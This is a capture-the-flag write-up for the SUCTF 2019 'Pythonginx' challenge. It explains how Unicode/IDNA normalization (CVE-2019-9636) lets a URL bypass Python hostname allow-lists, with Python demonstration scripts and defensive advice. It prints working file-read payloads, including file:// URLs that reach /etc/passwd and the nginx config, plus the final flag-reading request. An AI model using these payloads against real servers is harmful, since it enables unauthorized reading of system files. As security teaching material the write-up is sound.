[SUCTF 2019] Pythonginx


    0x00 Background

    This comes from a Black Hat USA 2019 talk.
    Slides:

    https://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf
    

    The relevant slide says the following:
    [slide image from the talk, not preserved in this copy]

    In other words, a URL we submit as http://evil.c℀.com becomes http://evil.ca/c.com after the processing above.
    

    In Unicode, the character ℀ (U+2100) is turned into a/c when IDNA processes it, so when you visit this URL the DNS server will automatically redirect the URL to a different website. If the server only restricts the domain name when it uses a URL supplied by the front end, this method lets us easily bypass the server's domain restriction.

    0x01 Unintended solution

    CVE-2019-9636: urlsplit does not apply NFKC normalization

    file:////suctf.cc/../../../../../etc/passwd
    
    URLs encoded with Punycode/IDNA use NFKC normalization to decompose characters [1]. This can result in some characters introducing new segments into a URL.
    
    For example, \uFF03 is not equal to '#' under direct comparison, but normalizes to '#' which changes the fragment part of the URL. Similarly \u2100 normalizes to 'a/c' which introduces a path segment.
    
    Currently, urlsplit() does not normalize, which may result in it returning a different netloc from what a browser would
    
    >>> u = "https://example.com\uFF03@bing.com"
    >>> urlsplit(u).netloc.rpartition("@")[2]
    bing.com
    
    >>> # Simulate
    >>> u = "https://example.com\uFF03@bing.com".encode("idna").decode("ascii")
    >>> urlsplit(u).netloc.rpartition("@")[2]
    example.com
    
    (Note that .netloc includes user/pass and .rpartition("@") is often used to remove it.)
    
    This may be used to steal cookies or authentication data from applications that use the netloc to cache or retrieve this information.
    
    The preferred fix for the urllib module is to detect and raise ValueError if NFKC-normalization of the netloc introduces any of '/?#@:'. Applications that want to avoid this error should perform their own decomposition using unicodedata or transcode to ASCII via IDNA.
    
    >>> # New behavior
    >>> u = "https://example.com\uFF03@bing.com"
    >>> urlsplit(u)
    ...
    ValueError: netloc 'example.com#@bing.com' contains invalid characters under NFKC normalization
    
    >>> # Workaround 1
    >>> u2 = unicodedata.normalize("NFKC", u)
    >>> urlsplit(u2)
    SplitResult(scheme='https', netloc='example.com', path='', query='', fragment='@bing.com')
    
    >>> # Workaround 2
    >>> u3 = u.encode("idna").decode("ascii")
    >>> urlsplit(u3)
    SplitResult(scheme='https', netloc='example.com', path='', query='', fragment='@bing.com')
    
    Note that we do not address other characters, such as those that convert into period. The error is only raised for changes that affect how urlsplit() locates the netloc and the very common next step of removing credentials from the netloc.
    
    This vulnerability was reported by Jonathan Birch of Microsoft Corporation and Panayiotis Panayiotou (p.panayiotou2@gmail.com) via the Python Security Response Team. A CVE number has been requested.
    
    [1]: https://unicode.org/reports/tr46/
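    A worked example, added here and not part of the original post or of the bug report quoted above: a Python check that mirrors the rule the fix describes (reject a netloc if NFKC normalization introduces any of '/?#@:'), the pre-fix credential-stripping host extraction next to the host a normalizing client would actually use, both workarounds from the report, and a probe for whether the running interpreter carries the fix. The sample URL is the report's \uFF03 case; the function names (naive_netloc, nfkc_introduces_delimiter and the rest) are this example's own, not stdlib API.

```python
import unicodedata
from urllib.parse import urlsplit

NETLOC_DELIMS = "/?#@:"


def nfkc_introduces_delimiter(netloc):
    """Mirror of the rule the fix describes: True when NFKC normalization of
    the netloc would introduce one of '/?#@:' that a parser has already used
    to locate the host.  Delimiters already present are stripped first so
    only normalization-induced ones count."""
    if netloc.isascii():
        return False
    stripped = netloc
    for c in NETLOC_DELIMS:
        stripped = stripped.replace(c, "")
    normalized = unicodedata.normalize("NFKC", stripped)
    return any(c in normalized for c in NETLOC_DELIMS)


def naive_netloc(url):
    """Netloc as a pre-fix parser located it: text after '://' up to the first
    '/', '?' or '#'.  Plain string splitting, so it behaves the same on a
    patched interpreter (where urlsplit() raises instead)."""
    netloc = url.split("://", 1)[1]
    for c in "/?#":
        netloc = netloc.split(c, 1)[0]
    return netloc


def naive_host(url):
    """The 'very common next step' from the report: drop credentials with rpartition('@')."""
    return naive_netloc(url).rpartition("@")[2]


def browser_host(url):
    """Workaround 1: NFKC-normalize before parsing; this is the host a
    normalizing client actually connects to."""
    return urlsplit(unicodedata.normalize("NFKC", url)).netloc.rpartition("@")[2]


def idna_transcode(url):
    """Workaround 2: the 'idna' codec runs nameprep (which applies NFKC) on
    each dot-separated label and returns an ASCII URL safe to hand to urlsplit()."""
    return url.encode("idna").decode("ascii")


def patched_urlsplit_raises(url):
    """True when the running interpreter carries the fix and refuses the URL."""
    try:
        urlsplit(url)
    except ValueError:
        return True
    return False


# Constructed sample: the report's FULLWIDTH NUMBER SIGN (U+FF03) case.
SAMPLE = "https://example.com\uFF03@bing.com"

if __name__ == "__main__":
    print("pre-fix host        :", naive_host(SAMPLE))
    print("normalized host     :", browser_host(SAMPLE))
    print("IDNA-transcoded URL :", idna_transcode(SAMPLE))
    print("NFKC adds delimiter :", nfkc_introduces_delimiter(naive_netloc(SAMPLE)))
    print("patched urlsplit    :", patched_urlsplit_raises(SAMPLE))
```

    Note what the rule does not cover: nfkc_introduces_delimiter returns False for a host such as suctf.cℂ (U+2102), because that character folds to a plain letter without adding a delimiter. That is the class of change the report explicitly leaves alone, so an application allow-list must compare hostnames only on the URL it will actually fetch, after IDNA transcoding, rather than rely on the stdlib check.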
    
    

    Link:
    https://bugs.python.org/issue36216

    0x02 Important Nginx file locations

    Configuration directory: /etc/nginx
    Main configuration file: /etc/nginx/conf/nginx.conf
    Service unit (management script): /usr/lib64/systemd/system/nginx.service
    Modules: /usr/lib64/nginx/modules
    Binary: /usr/sbin/nginx
    Default web root: /usr/share/nginx/html
    Default log directory: /var/log/nginx
    Configuration file path: /usr/local/nginx/conf/nginx.conf
    
    

    0x03 Solution

    Opening the challenge, we are given the source code:

    from flask import Flask, Blueprint, request, Response, escape ,render_template
    from urllib.parse import urlsplit, urlunsplit, unquote
    from urllib import parse
    import urllib.request
    
    app = Flask(__name__)
    
    # Index
    @app.route('/', methods=['GET'])
    def app_index():
        return render_template('index.html')
    
    @app.route('/getUrl', methods=['GET', 'POST'])
    def getUrl():
        url = request.args.get("url")
        host = parse.urlparse(url).hostname
        if host == 'suctf.cc':
            return "我扌 your problem? 111"
        parts = list(urlsplit(url))
        host = parts[1]
        if host == 'suctf.cc':
            return "我扌 your problem? 222 " + host
        newhost = []
        for h in host.split('.'):
            newhost.append(h.encode('idna').decode('utf-8'))
        parts[1] = '.'.join(newhost)
        # strip spaces from the url
        finalUrl = urlunsplit(parts).split(' ')[0]
        host = parse.urlparse(finalUrl).hostname
        if host == 'suctf.cc':
            return urllib.request.urlopen(finalUrl).read()
        else:
            return "我扌 your problem? 333"
    
    if __name__ == "__main__":
        app.run(host='0.0.0.0', port=80)
    
    Code review
    

    The first two checks test whether host is suctf.cc, and we only get past them if it is not. Then, after decode('utf-8'), the host is passed into urlunsplit, and at the third check it must equal suctf.cc. So we construct directly:
    file://suctf.c℆sr/local/nginx/conf/nginx.conf (another bypass is to use ℂ in place of c), which lets us read the nginx config and find where the flag is:

    server {
        listen 80;
        location / {
            try_files $uri @app;
        }
        location @app {
            include uwsgi_params;
            uwsgi_pass unix:///tmp/uwsgi.sock;
        }
        location /static {
            alias /app/static;
        }
        # location /flag {
        #     alias /usr/fffffflag;
        # }
    }
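    To tie the host-split idea from 0x00 (evil.c℀.com becoming evil.ca/c.com) to the three checks in the challenge source, here is an added Python example; it is not the challenge's code and not from the original post. It replays the three checks on the payloads discussed above. prefix_split reproduces the pre-fix netloc split by hand, because on Python 3.7.3 and later urlparse/urlsplit refuse the raw ℆ payload with ValueError before the first check ever runs (the challenge must therefore have been running an older interpreter); idna_per_label is the same per-label IDNA step the source performs. All function names (nfkc, idna_per_label, prefix_split, challenge_checks) are this example's own.

```python
import unicodedata
from urllib.parse import urlsplit, urlunsplit


def nfkc(ch):
    """What NFKC (and therefore IDNA nameprep) expands a character into."""
    return unicodedata.normalize("NFKC", ch)


def idna_per_label(host):
    """The challenge's per-label step: each label goes through the 'idna' codec,
    whose nameprep applies NFKC and case folding, so U+2106 ℆ becomes 'c/u'
    and U+2102 ℂ becomes 'c' inside the label."""
    return ".".join(label.encode("idna").decode("ascii") for label in host.split("."))


def prefix_split(url):
    """scheme / netloc / rest split the way urlsplit() behaved before the
    CVE-2019-9636 fix (no NFKC check).  Done by hand so it runs identically on
    patched interpreters, where urlsplit() would raise ValueError instead."""
    scheme, _, rest = url.partition("://")
    netloc, slash, path = rest.partition("/")
    return scheme, netloc, slash + path


def challenge_checks(url, allowed="suctf.cc"):
    """Replay the three host checks of getUrl().  Returns ('rejected', n) with
    the number of the check that fired, or ('allowed', final_url)."""
    scheme, netloc, path = prefix_split(url)
    if netloc.lower() == allowed:                  # check 1: urlparse(url).hostname
        return ("rejected", 1)
    if netloc == allowed:                          # check 2: urlsplit(url)[1]
        return ("rejected", 2)
    rebuilt = urlunsplit((scheme, idna_per_label(netloc), path, "", ""))
    final_url = rebuilt.split(" ")[0]              # the source cuts at the first space
    if urlsplit(final_url).hostname == allowed:    # check 3: host of the URL actually fetched
        return ("allowed", final_url)
    return ("rejected", 3)


if __name__ == "__main__":
    for ch in "\u2100\u2106\u2102":
        print(f"U+{ord(ch):04X} {ch!r} -> NFKC {nfkc(ch)!r}")
    # Constructed inputs: the 0x00 example, the two payloads from this writeup,
    # and a plain suctf.cc URL that the first check stops.
    print(challenge_checks("http://evil.c\u2100.com", allowed="evil.ca"))
    for u in ("file://suctf.c\u2106sr/local/nginx/conf/nginx.conf",
              "file://suctf.c\u2102/usr/fffffflag",
              "file://suctf.cc/usr/fffffflag"):
        print(u, "->", challenge_checks(u))
```

    The ℂ variant works for a different reason than ℆: NFKC turns U+2102 into an uppercase C, and nameprep then case-folds it to c, so the netloc differs from suctf.cc before the IDNA step and equals it afterwards without any delimiter being introduced. That also means the stdlib fix for CVE-2019-9636 does not reject it; the only robust defence is to run the allow-list check once, on the hostname of the exact URL that will be fetched, after normalization.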
    

    Reading the flag

    http://d7844ab4-68f7-4e76-9432-a112b65afa1f.node3.buuoj.cn/getUrl?url=file://suctf.c%E2%84%86sr/fffffflag
    

    References

    https://blog.csdn.net/qq_42181428/article/details/99741920

    Original article: https://www.cnblogs.com/wangtanzhi/p/12181032.html